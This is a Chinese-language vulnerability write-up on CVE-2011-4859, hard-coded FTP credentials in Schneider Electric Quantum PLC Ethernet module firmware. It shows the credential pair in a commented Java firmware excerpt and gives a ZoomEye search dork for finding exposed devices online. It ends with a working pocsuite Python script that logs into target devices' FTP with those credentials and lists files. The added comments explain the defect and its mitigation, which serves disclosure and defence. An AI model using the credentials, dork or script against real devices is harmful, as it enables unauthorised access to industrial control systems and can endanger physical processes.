通过分析设备固件可以得知,文件系统中包含硬编码方式保存的用户凭证信息。
这些信息主要用于提供对外的FTP服务升级服务。
其中,问题代码位于 **/FLASH0/wwwroot/classes/SACommjar** 包中,具体的类路径为 com.schneiderautomation.misc.TextFiles,问题位于该类的第266行至268行。
package com.schneiderautomation.misc;
import com.schneiderautomation.ftpsession.FTPSession;
import com.schneiderautomation.ftpsession.FileInfo;
import com.schneiderautomation.ftpsession.FtpSessionException;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.io.Writer;
import java.net.URL;
import java.net.URLConnection;
import java.util.Locale;
import java.util.Vector;
public class TextFiles
{
// Fixed service-account credentials compiled into the class. connect()
// below passes the same two values as string literals (CVE-2011-4859).
// Anyone able to read this jar from the device file system (the path is
// quoted above the listing) can recover them, and they cannot be rotated
// without a firmware update. Authentication events for this account on
// the device's FTP service are therefore worth monitoring until the
// credential is removed from distributed code.
private static final String USER = "sysdiag";
private static final String PASSWORD = "factorycast@schneider";
// When true, connect() opens the FTP session on its own.
private boolean fAutoConnect = true;
// Not referenced anywhere in the visible excerpt.
private Thread engine = null;
// Host and locale handed to FTPSession by connect().
private String host;
private Locale locale;
// Session created by connect(); disconnect() is invoked on login failure when it is non-null.
private FTPSession ftp;
....
/**
 * Opens the FTP session used by this class when automatic connection
 * is enabled ({@code fAutoConnect}); otherwise does nothing.
 *
 * <p>Security note: the login on the marked line uses a fixed service
 * account whose values are compiled into this class (they duplicate the
 * {@code USER}/{@code PASSWORD} constants declared above). Because the
 * credential ships inside a jar on the device file system, it is
 * recoverable by anyone who can read the jar and cannot be changed
 * without a firmware update; this is the defect tracked as
 * CVE-2011-4859. The mitigation is to stop embedding device
 * credentials in distributed code: obtain them at runtime from a
 * per-device, changeable source and treat the account like any other
 * privileged login (logged, monitored, rotatable).
 *
 * @throws IOException if the connection or login fails. Only the
 *         message of the underlying {@code FtpSessionException} is
 *         carried over; the exception itself is not chained as a cause.
 */
private void connect()
throws IOException
{
    // With auto-connect off this.ftp is left untouched — presumably the
    // caller establishes the session another way (not visible here).
    if (this.fAutoConnect)
        try
        {
            this.ftp = new FTPSession(this.locale);
            this.ftp.connectHost(this.host);
            // Hard-coded credential; same values as USER/PASSWORD above.
            this.ftp.login("sysdiag", "factorycast@schneider"); //CVE-2011-4859
        }
        catch (FtpSessionException localFtpSessionException)
        {
            // Tear down the half-open session before reporting the failure.
            if (this.ftp != null)
                disconnect();
            // Message-only rethrow: the original exception is dropped.
            throw new IOException(localFtpSessionException.getMessage());
        }
}
....
}
通过ZoomEye系统提供的Dork [“Schneider Web”] 可获悉部分设备在互联网上的部署情况,可通过FTP命令尝试登录验证。
引用:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import ftplib
import urlparse
import socket
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register
class POC(POCBase):
    # pocsuite plugin describing the hard-coded FTP service account found in
    # the firmware excerpt above (CVE-2011-4859). Written for Python 2
    # (urlparse module, `except Exception, err` syntax); it will not run on
    # Python 3 as-is.
    vulID = '89384' # vul ID
    version = '1'
    author = 'Wyc'
    vulDate = '2014-05-15'
    createDate = '2015-09-05'
    updateDate = '2015-09-09'
    references = ['http://sebug.net/vuldb/ssvid-89384']
    name = '施耐德(Schneider) PLC 以太网模块固件后门'
    appPowerLink = 'http://www.schneider-electric.cn/zh/product-range/538-modicon-quantum?xtmc=Quantum&xtcr=1'
    appName = 'Schneider Quantum NOE771'
    # Note: the value below is misspelled; it is a runtime string and is left as-is.
    appVersion = 'unkown'
    vulType = 'backdoor'
    desc = '''
Schneider Electric Quantum Ethernet模块对 (1) AUTCSE (2) AUT_CSE
(3) fdrusers (4) ftpuser(5)loader(6)nic2212(7)nimrohs2212
(8) nip2212(9)noe77111_v500(10) ntpupdate(11) pcfactory(12) sysdiag
(13) target(14) test(15) USER和(16) webserver accounts使用了硬编码方式输入密码,使得远程攻击者可借助
(a) TELNET(b) Windriver Debug或者(c) FTP端口获取访问。
'''
    # the sample sites for examine
    def _verify(self):
        """Check whether the target's FTP service accepts the fixed account.

        Resolves the host part of ``self.url``, opens an FTP connection on
        port 21 with a 5-second timeout, logs in with the account quoted in
        the firmware excerpt and lists the current directory. Success records
        only the URL under ``VerifyInfo``; any exception at all (DNS failure,
        timeout, refused login) is reported as a generic failure, so an
        unreachable host and a patched device are indistinguishable in the
        output. ``connect`` is called twice in a row and ``ret``, ``welcome``,
        ``login`` and ``ls`` are never read.

        Returns the populated ``Output`` object.
        """
        output = Output(self)
        result = {}
        target = socket.gethostbyname(urlparse.urlsplit(self.url)[1])
        try:
            ftp = ftplib.FTP(timeout=5)
            ret = ftp.connect(host=target, port=21, timeout=5)
            welcome = ftp.connect(host=target, port=21, timeout=5)
            login = ftp.login(user='sysdiag', passwd='factorycast@schneider')
            ls = ftp.nlst()
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            output.success(result)
        except Exception, err:
            # Broad catch: `err` is discarded, so the failure reason is lost.
            output.fail('Internet Nothing returned')
        return output
    def _attack(self):
        """Delegate to ``_verify``; no action beyond the login check is taken."""
        return self._verify()
# Register the plugin class with the pocsuite framework (register is imported from pocsuite.utils above).
register(POC)